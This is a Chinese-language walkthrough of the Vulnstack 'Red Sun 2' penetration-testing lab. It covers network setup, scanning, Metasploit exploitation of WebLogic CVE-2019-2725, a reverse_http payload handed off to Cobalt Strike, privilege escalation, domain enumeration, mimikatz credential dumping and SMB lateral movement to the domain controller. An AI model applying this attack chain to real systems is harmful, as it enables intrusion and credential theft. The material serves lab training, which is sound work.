靶场练习-红日靶场2

红日靶场二

红日靶场二启动!!!

环境搭建

官方下载地址以及实验文档如下:

http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

跟靶场一中的环境类似需要模拟内网和外网两个网段。

Kali配置如下:

1
网络适配器:NAT

PC配置如下:

1
2
网络适配器:NAT
网络适配器:仅主机模式

WEB配置如下:

1
2
网络适配器:NAT
网络适配器:仅主机模式

DC(域控)配置如下:

1
网络适配器:仅主机模式

需要对虚拟网络适配器进行调整,设置一个192.168.111.0网段的和10.10.10.0网段的。

网络配置完成,这三台虚拟主机默认开机密码都是:密码1qaz@WSX
注意WEB的这台服务器,切换用户de1ay或者管理员用户administrator,密码也是1qaz@WSX

开启服务

进入WEB,在如下路径开启Weblogic服务。

1
C:\Oracle\Middleware\user_projects\domains\base_domain\bin

右键以管理员身份运行startWebLogic

至此环境就算配置完成了。

ip如下:

1
2
3
4
5
6
7
8
9
kali:192.168.111.128

PC:192.168.111.201
	10.10.10.201
	
WEB:192.168.111.80
	 10.10.10.80

DC:10.10.10.10

渗透阶段

漏洞扫描

老规矩nmap开扫

1
nmap 192.168.111.0/24

结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Nmap scan report for 192.168.111.80
Host is up (0.00034s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-wbt-server
7001/tcp  open  afs3-callback
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:82:6E:D7 (VMware)

在WEB里开启了80、3389、445、7001这些端口,这里利用方法有很多,可以利用永恒之蓝获取shell,但是这里不采用永恒之蓝,这里开启了7001端口,因为weblogic的默认端口是7001,所以可以访问192.168.1.158:7001,访问后可以手工测试漏洞,也可以利用工具测试是否存在漏洞。

WeblogicScan 可以扫描网站是否存在weblogic漏洞,扫描器下载地址如下:

1
2
3
1.https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip

2.https://github.com/dr0op/WeblogicScan.git

下载好后,执行命令:

1
python WeblogicScan.py 192.168.111.80 7001

risec2-1

通过扫描发现存在SSRF CVE-2019-2725 CVE-2019-2729的漏洞。

当然也扫出了ssrf漏洞,但是这里不进行测试和利用,感兴趣的可以参考文章:

1
https://blog.csdn.net/LTtiandd/article/details/99592832

CVE利用

msf里面集成了很多漏洞模块,可以利用msf来帮我们取getshell

1
2
msfconsole
search CVE-2019-2725

risec2-1

1
2
3
4
5
use 0
set rhost 192.168.111.80
set lhost 192.168.111.128
set target 1
run

结果监听到会话(可能要多试几次),接下来就是信息收集

1
2
getuid
run get_local_subnets

尝试提权

1
2
getsystem
getuid

提权失败,当前只是管理员权限,所以无法利用mimikatz获取到账户密码,本来想用socks进行横向移动的,但是感觉有点麻烦,思路跟红日一是差不多的。这里使用CS来联动,而且可以利用CS提权和横向移动,更方便一点。

CS联动

服务端启动

1
sudo ./teamserver 192.168.111.128 123456

客户端启动

1
./start.sh

创建一个监听

risec2-1

回到msf,配置如下:

1
2
3
4
5
6
7
8
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1.159
set lport 7777
set session 1
run

然后回到CS发现WEB上线了

risec2-1

这里我是习惯将命令回显的时间改为1

1
beacon> sleep 1

接下来就是提权,elevate是提权的意思

risec2-1

成功提权,就会多一个system账户。

下面进行信息收集

1
ipconfig /all   # 查看本机ip,所在域

发现WEB有两个网段192.168.111.0/24和10.10.10.0/24网段,所在域是de1ay.com。

risec2-1

查询域内用户

1
2
3
4
5
net user /domain

--------------------------------------------------
Administrator		de1ay		Guest
krbtqt				mssql

查看域管理员用户

1
2
3
4
net group "domain admins" /domain

--------------------------------------------------
Administrator

查看域控

1
2
3
4
net group "domain controllers" /domain

--------------------------------------------------
DC$

查看域中的其他主机名

1
2
3
4
net group "domain computers" /domain

--------------------------------------------------
PC$				WEB$

横向移动

利用portscan不仅可以扫描端口,还可以扫描网段存活的ip:

1
portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024

risec2-1

可以看到PC和DC都开放了139和445端口,那么接下来的横向移动可以利用smb服务进行横移。

先获取密码,利用mimikatz获取密码

risec2-1

再创建一个smb服务的监听

risec2-1

然后对DC进行横移

risec2-1

risec2-1

点launch,稍等一会就可以了。

DC还是system权限的,下面就是PC进行横向移动。

risec2-1

PC也是利用smb服务来横向移动的,这里就不赘述了,成功后PC也是system权限的。

这里附上最后渗透成功的图片

risec2-13